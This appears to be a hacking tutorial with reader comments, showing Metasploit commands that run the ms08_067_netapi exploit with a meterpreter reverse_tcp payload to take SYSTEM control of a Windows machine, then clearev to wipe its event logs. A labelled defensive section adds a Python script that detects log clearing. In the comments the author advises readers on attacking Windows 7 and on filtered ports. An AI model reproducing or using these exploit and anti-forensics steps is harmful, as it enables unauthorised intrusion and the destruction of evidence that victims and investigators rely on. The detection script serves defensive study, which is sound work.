Hack Like a Pro: How to Cover Your Tracks So You Aren't Detected

Welcome back, my greenhorn hackers!

Congratulations on your successful hack that saved the world from nuclear annihilation at the hands of our little, bellicose, Twinkie-eating dictator. The rest of the world may not know what you did, but I do. Good job!

Now that we hacked into the malevolent dictator's computer and temporarily disabled his nuclear launch capability, we have to think about covering our tracks so that he and his minions can't track our good works back to us.

So, in this hack, we will go into his computer again, implant the Meterpreter, and remove from his event logs any trace that we were there. Let's fire up Metasploit and get to work on removing any evidence that we were ever on the dictator's computer.

Step 1: Compromise His System Again

Let's start with the same hack we used to get into the dictator's computer initially:

exploit/windows/smb/ms08_067_netapi

But instead of using the VNC payload, we will load the Meterpreter payload. Type:

  • msf > use exploit/windows/smb/ms08_067_netapi

Before we move on, let's learn a bit more about this exploit. Type:

  • msf exploit(ms08_067_netapi) > info

This prints the module's description, targets and options. The description tells us that this hack exploits a parsing flaw in the path canonicalization code of NetAPI32.dll, reached through the Server service over SMB. Because the flaw gives us code execution on the target, we can place our own payload on the system, which in this case is the Meterpreter.

Now we load the payload by typing:

  • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

Now that we have the exploit and payload set, we need to set the options. In this case, we need to set LHOST (us, the attacker) and RHOST (the victim, our belligerent dictator's computer) with the set command, giving the IP address of your computer and of his computer respectively. Remember that reverse_tcp makes the victim connect back to LHOST, so LHOST must be an address his computer can actually reach; an address behind NAT or a VPN that does not forward the port will never receive the session.

Step 2: Take Control of His Computer

Now that we have everything set to take control, we just type:

  • msf exploit(ms08_067_netapi) > exploit

If we are successful, we should see a Meterpreter prompt on our screen. Because the Server service runs as SYSTEM, our session runs as SYSTEM too. We now have complete control of his system!

At the meterpreter prompt, we now type:

  • meterpreter > clearev

This command clears the Application, System and Security event logs on our bellicose dictator's computer, so that he and his minions have no record of what we did there. If we could open the Event Viewer on his computer, we would see that all three logs are now empty. One caveat a careful hacker should know: Windows logs the clearing itself, so the freshly emptied Security log begins with a record saying that it was wiped, and anything his computer has already forwarded to a central log server is beyond our reach.

This is critical for two reasons: it protects us from being found out, and it preserves our access to his computer. Once they know that someone has hacked it, they will likely patch it and take other measures to prevent our returning.
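What the defender's side of this looks like, as an added example that is not code from the original post: clearev empties the logs, but Windows writes a record of the clearing, and that record is what a detection rule keys on. The Security log gets event ID 1102 ("The audit log was cleared") on Vista and later, or 517 on XP and 2003; on Vista and later the System log gets event ID 104 ("The <name> log file was cleared") for each log that was emptied. The script below parses a small set of log records that are constructed for this example, in a made-up tab-separated export format (not real captured logs), and flags three things: the clearing records themselves, logs whose oldest surviving entry is their own clearing event, and several logs cleared within one short window, which is the pattern clearev produces.

```python
"""Detect event-log clearing, the footprint that meterpreter's clearev leaves.

Added example; not code from the original post. clearev empties the
Application, System and Security logs, but Windows audits the clearing:
Security records event 1102 (Vista and later) or 517 (XP/2003), and on
Vista and later System records event 104 for each log that was emptied.
The log lines below are constructed for this example in a made-up
tab-separated export format; they are not real captured logs.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

# (channel, event id) pairs that record a log being cleared.
LOG_CLEARED_IDS = {("Security", 1102), ("Security", 517), ("System", 104)}


@dataclass(frozen=True)
class EventRecord:
    time: datetime
    channel: str
    event_id: int
    message: str


# Constructed sample: a Vista-era host right after clearev. Each cleared log
# now starts with the record of its own clearing; nothing older survives.
SAMPLE_HOST_EXPORT = """\
2013-04-02 10:15:41\tSecurity\t1102\tThe audit log was cleared
2013-04-02 10:15:41\tSystem\t104\tThe Application log file was cleared
2013-04-02 10:15:41\tSystem\t104\tThe System log file was cleared
2013-04-02 10:15:42\tSecurity\t4624\tAn account was successfully logged on
2013-04-02 10:16:00\tApplication\t1000\tFaulting application name: notepad.exe
"""

# Constructed sample of an untouched host: older history, no clearing events.
SAMPLE_CLEAN_EXPORT = """\
2013-03-30 08:00:00\tSystem\t6005\tThe Event log service was started
2013-03-30 08:00:05\tSecurity\t4624\tAn account was successfully logged on
2013-04-02 10:16:00\tApplication\t1000\tFaulting application name: notepad.exe
"""


def parse_export(text: str) -> List[EventRecord]:
    """Parse the constructed '<time>\\t<channel>\\t<event id>\\t<message>' lines."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, channel, event_id, message = line.split("\t", 3)
        records.append(EventRecord(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                                   channel, int(event_id), message))
    return records


def find_log_clearing(records: List[EventRecord]) -> List[EventRecord]:
    """Every record that documents a log being cleared."""
    return [r for r in records if (r.channel, r.event_id) in LOG_CLEARED_IDS]


def emptied_channels(records: List[EventRecord]) -> List[str]:
    """Channels whose oldest surviving record is their own 'cleared' event.

    That is what clearev leaves in the Security and System logs: the wipe is
    the first entry because everything before it is gone.
    """
    oldest: Dict[str, EventRecord] = {}
    for r in records:
        if r.channel not in oldest or r.time < oldest[r.channel].time:
            oldest[r.channel] = r
    return sorted(ch for ch, r in oldest.items()
                  if (ch, r.event_id) in LOG_CLEARED_IDS)


def find_bulk_wipe(records: List[EventRecord],
                   window: timedelta = timedelta(seconds=60)) -> List[List[str]]:
    """Groups of distinct channels whose clearing events fall in one window.

    An administrator occasionally clears one log; clearev clears them all in
    one go, so several channels cleared within seconds is the stronger signal.
    """
    cleared = sorted(find_log_clearing(records), key=lambda r: r.time)
    groups: List[List[EventRecord]] = []
    for r in cleared:
        if groups and r.time - groups[-1][-1].time <= window:
            groups[-1].append(r)
        else:
            groups.append([r])
    return [sorted({r.channel for r in g}) for g in groups
            if len({r.channel for r in g}) > 1]


if __name__ == "__main__":
    host = parse_export(SAMPLE_HOST_EXPORT)
    print("clearing records:", [(r.channel, r.event_id) for r in find_log_clearing(host)])
    print("emptied channels:", emptied_channels(host))
    print("bulk wipes      :", find_bulk_wipe(host))
    print("untouched host  :", find_bulk_wipe(parse_export(SAMPLE_CLEAN_EXPORT)))
```

The bulk-wipe check is the one worth alerting on: a lone 1102 may be an administrator tidying up, but Security and System both emptied in the same minute is the signature of a tool, and if the victim forwards its events to a collector, the collector still holds everything clearev removed from the host.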

Now, make sure to come back for more hacking fun and games on our dictator's computer!

Photos by The Guardian, Matthew Collingwood/Shutterstock

45 Comments

What is BackTrack 5? I always see it up when you use Metasploit. Do we need it?

Hi Ben:

BackTrack 5 is a Linux distribution with hundreds of hacking and security tools. No, you don't need it, but I recommend it.

OTW

Hi, I know this does not have to do with this article, but I have been wondering this. When I download Metasploit, it asks for the port, days of validity, and server name. What does this mean for my router? Will it cost extra? Will it show up as an open port on the router? Sorry if this sounds newbie, I am new to this, and I would like help so I can get better.

Ben:

Are you downloading it to Windows? Or are you downloading Armitage?

You are better off just installing BackTrack, but you will need to know a bit of Linux.

OTW

Oh, sorry. I'm using Windows 7.

Are you really hacking into the dictator's computer, or is it a joke?

Aditya:

We really hacked into the dictator's computer and saved the world ;-)

Hey, I would like to use BackTrack on a Mac. Is that possible?

Hi sir, hope you are fine.
After writing the exploit command it gives me this error:
exploit exceptions: no matching target

Wajid:

It looks like you are attacking a Win 7 machine. Is that correct?

OTW

Yes. What is wrong with that? Do you know any solution for that?

Wajid:

This attack is not for Windows 7. It only works for XP, 2003, Vista and some 2008.

OTW

So can you show me how to hack Windows 7 Enterprise 32-bit, and Windows 8?

Can I hack Windows 7? If yes, then how?

Are you there, sir? I am waiting for your comment.

Wajid:

There are a number of different ways to hack Win 7, but they usually involve hacking one of the client-side applications like the browser, Office or a PDF reader. I have a few tutorials on doing each of these on Null Byte. In addition, there is a brand new hack of Win 7 out that I will put up soon.

OTW

Then I should wait, right?
One more thing: can you show how to install TightVNC on BackTrack 5?

Hey, this works only in a virtual machine; it doesn't work between two computers.

If this is that easy, then why do the most sophisticated hackers get caught?

Wajid:

Yes, you should wait or look at my tutorials on PDF or Word docs.

These work on either a virtual machine or a physical machine.

This just shows you a few techniques of covering your tracks. There are more that I will write about in the future. BTW, most sophisticated hackers do NOT get caught. It's the script kiddies that get caught.

OTW

Hi sir! Hope you are fine and enjoying good health.

My question is that I can't find some of the options in BackTrack 5. Currently I don't know whether they are missing from BackTrack 5 or I must download them. Some of the missing files are wordlist.lst, wifi-honey, fern-wifi-cracker, host, pyrift, reaver, wifite, etc.

I upgraded and updated BackTrack 5 R3 as well, but nothing happens.

Could you give a little bit of instruction about it, please?

Thanks

Wajid:

Try using the "locate" command to find those apps and files.

OTW

You mean by Ctrl+F or search, right?
The search option didn't find it as well.

Wajid:

I meant using the locate command in Linux. For example:

bt> locate reaver

OTW

Please sir, I am new to your forum. How can I get the link to the previous tutorial?

Horls:

What previous tutorial are you looking for?

OTW

This tutorial is about covering tracks, so I am asking about the tutorial where the attack was performed. I would also be glad if you can help me with a tutorial on how to attack a Win 7 computer or higher.

Horls:

I have numerous attack tutorials, but this one is from here.

OTW

Sir OTW,
Will Meterpreter still work as it should even if I use a VPN to somehow disguise my real IP?

I really wish someone would do these tutorials using a Windows computer. I realize it's the hacker's choice to use Linux and BackTrack, but unfortunately not all of us have it. Also, you can't even use Metasploit unless you have a minimum of 16GB on your computer. Not very many people have that type of RAM, and even fewer realize that is the requirement.

I'm impressed with your patience, OTW!

Will this hack only work if port 445 is open? When I used nmap to scan to see if it was open, it didn't say open or closed; it said filtered. I've read a lot of your tutorials, but you have never mentioned (to my knowledge) what the filtered status means. Can you use a hack over a "filtered" port? Any response would be appreciated.

Turkey:

Port 445 must be open, but that is usually not a problem, as nearly every Windows machine has port 445 (SMB) open. Filtered means that there is likely a firewall between you and the target.

OTW

Read a comment farther up:
SniperCatz said you need a minimum of "16 GB" on your computer to run Metasploit.

Did they mean 16GB of RAM or 16GB of hard-disk space?

Neither. Some people's comments are simply inaccurate.

I agree. SniperCatz is wrong.

FYI, Ninja, he was saying RAM: "Not very many people have that type of RAM."

Metasploit takes less than 1GB of hard drive space, and although Rapid7 lists 2GB as the minimum RAM, I would recommend 4GB or more.

Is there any way to hack Windows 7 remotely?

How do you delete the logs specific to our hack instead of deleting the full log file?

I know it's possible. I read an article long ago: one hacker tried to cover his tracks by deleting the logs specific to his hack, but unfortunately he accidentally deleted some important backup logs and got caught.
